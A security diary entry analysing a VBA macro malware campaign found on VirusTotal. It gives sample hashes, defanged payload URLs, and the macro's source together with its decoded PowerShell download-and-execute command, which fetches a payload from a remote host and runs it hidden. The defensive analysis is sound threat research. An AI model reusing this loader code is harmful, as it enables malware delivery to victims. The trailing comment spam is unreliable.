Tracking A Malware Campaign Through VT
During the weekend, I found several samples from the same VBA macro. The only difference between all the samples was the URL to fetch a malicious PE file. I have a specific YARA rule to search for embedded PowerShell strings and my rule fired several times with the same pattern and similar size. Here is the pattern:
31 78 77 64 58 52 30 65 53 35 6C 65 47 55 6E 4B 1xwdXR0eS5leGUnK 54 73 6F 54 6D 56 33 4C 55 39 69 61 6D 56 6A 64 TsoTmV3LU9iamVjd 43 41 74 59 32 39 74 49 46 4E 6F 5A 57 78 73 4C CAtY29tIFNoZWxsL
YARA reacted on 'TmV3LU9iamVjd' which is the Base64-encoded string 'New-Object'.
I downloaded several files to analyze them:
| Hash | Score | Timestamp | Submission | Country |
|---|---|---|---|---|
| 2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 8/58 | 2020-08-20 02:05:10 UTC | e74f3978 | US |
| c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 | 9/57 | 2020-08-20 03:39:30 UTC | e74f3978 | US |
| d86cfc2c43a0599b23416cfc3be08e8c3d8d2b2b7b7b935b76d8ec6aa70e1705 | 8/58 | 2020-08-20 01:13:49 UTC | e74f3978 | US |
| 174b27b020f930f5395cd993e92ebfc2795b1f3664265be7cea9d1405e870cd0 | 7/58 | 2020-08-19 19:30:20 UTC | e74f3978 | US |
| caf1e1da396743767f9e2a3c4b85780bc0146aeaae8bed18aef9d5c918fda439 | 9/57 | 2020-08-21 00:05:49 UTC | e74f3978 | US |
| b52f376b6b49a7c73e7a0befc821661bb9f19f5b4cf1561f277f7d347745a199 | 9/57 | 2020-08-20 22:57:00 UTC | e74f3978 | US |
| ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/58 | 2020-08-20 22:43:53 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 8/56 | 2020-08-20 23:44:18 UTC | e74f3978 | US |
| b0f6c17244c2f8cce46425212f5cf9786fbd36727c34bf4d10d90d6a073a539e | 9/57 | 2020-08-20 23:58:14 UTC | e74f3978 | US |
| d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 8/57 | 2020-08-20 22:45:54 UTC | e74f3978 | US |
| b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/58 | 2020-08-20 23:39:47 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
| ef20a30463d0935ab34f119604ad5890c2d2ee0e4e400ed43c7faf4a8fd5b528 | 9/57 | 2020-08-22 03:31:37 UTC | e74f3978 | US |
| 670a126982f22add8d6a8f662ec67691f64484d6d86fff76adae5804b7e8939c | 9/57 | 2020-08-22 03:56:41 UTC | e74f3978 | US |
| d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb | 9/56 | 2020-08-22 03:54:50 UTC | e74f3978 | US |
| 2169c95c7587d4876449e0a57cb0f057d9df19e867a73e83e63aeaca1e2d4eae | 9/58 | 2020-08-22 03:45:04 UTC | e74f3978 | US |
| b8f308694b369a2e4d0a51966e6962eb0f2ac55e9cddcbbe726b0f867f9e6a66 | 8/56 | 2020-08-22 03:37:19 UTC | e74f3978 | US |
| 566e46a36fbeadf23a43541d8fb19d5d1cd8f3e33b60abef221a1f6a1af0f1cb | 9/57 | 2020-08-22 03:34:29 UTC | e74f3978 | US |
As you can see, all samples were submitted from the US and from the same account. Their scores are also very close to each other.
All of them contain the same VBA macro and the only difference is the downloader link:
$ diff \ c5f3874b7cd7ae726b12b7488d374972cb63b6e7dac73d71ededc20d80cf8318 \ d0abcbb7ec6caf6abc49dea519db003a7b82fe5520c2e74cf55f7f9bc4dd37cb 10c10 < Loader"aHR0cDovLzE5OC4xMi42Ni4xMDQvbVZQMjlVQVl4bEZsU3JGLmV4ZQ==" --- > Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
Here is the list of extracted URLs:
$ grep 'Loader"' * | awk -F '"' '{ print $2}' | while read L; do echo $L | base64 -d; echo ; done
hxxp://198[.]12[.]66[.]104/bOYzlVIPPDT3m7g[.]exe
hxxp://198[.]12[.]66[.]106/924ZJpzgdvpZuNt[.]exe
hxxp://198[.]12[.]66[.]106/TuSQk2FmRK1iLJI[.]exe
hxxp://198[.]12[.]66[.]104/jojocrypted[.]exe
hxxp://198[.]12[.]66[.]106/royalcrypted[.]exe
hxxp://brandotoday[.]com/Sample3[.]exe
hxxp://198[.]12[.]66[.]104/99crypted[.]exe
hxxp://198[.]12[.]66[.]104/mVP29UAYxlFlSrF[.]exe
hxxp://198[.]12[.]66[.]104/miccrypted[.]exe
hxxp://198[.]12[.]66[.]106/flocrypted[.]exe
hxxp://198[.]12[.]66[.]106/qlOZ1gn6tOo0tx7[.]exe
hxxp://198[.]12[.]66[.]106/vipcrypted[.]exe
The macro is a simple but effective one. It tries to download and execute the payload as 'putty.exe':
Private Sub Workbook_Open()
Loader"aHR0cDovLzE5OC4xMi42Ni4xMDYvZmxvY3J5cHRlZC5leGU="
End Sub
Public Sub Loader(Link As String)
CreateObject(AWqQ32PO095TRDFvcBBnMZAqQP87BXCVrwe_QARWE("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xwdXR0eS5leGUnKTsoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4ZWN1dGUoJGVudjpUZW1wKydccHV0dHkuZXhlJyk="))
End Sub
The decoded executed content is:
CreateObject(WScript.Shell)).Run( \
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile(' \
& Link & \
',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
All downloads failed but I found a sample already available on VT[1]. It looks like an Agent Tesla.
The question is: who's behind the submission key and submitted so many times those samples? VT does not allow us to search all submissions from the same account (which could be a great feature for hunting purposes!).
Some possible scenario:
- Developers of the macro who are testing their macro? I don't think because just the link changes across all the submissions
- An organization that's facing many similar documents and they have an automatic submission to VT?
- Another security researcher?
While writing this diary, I still found five new samples, it's still ongoing!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago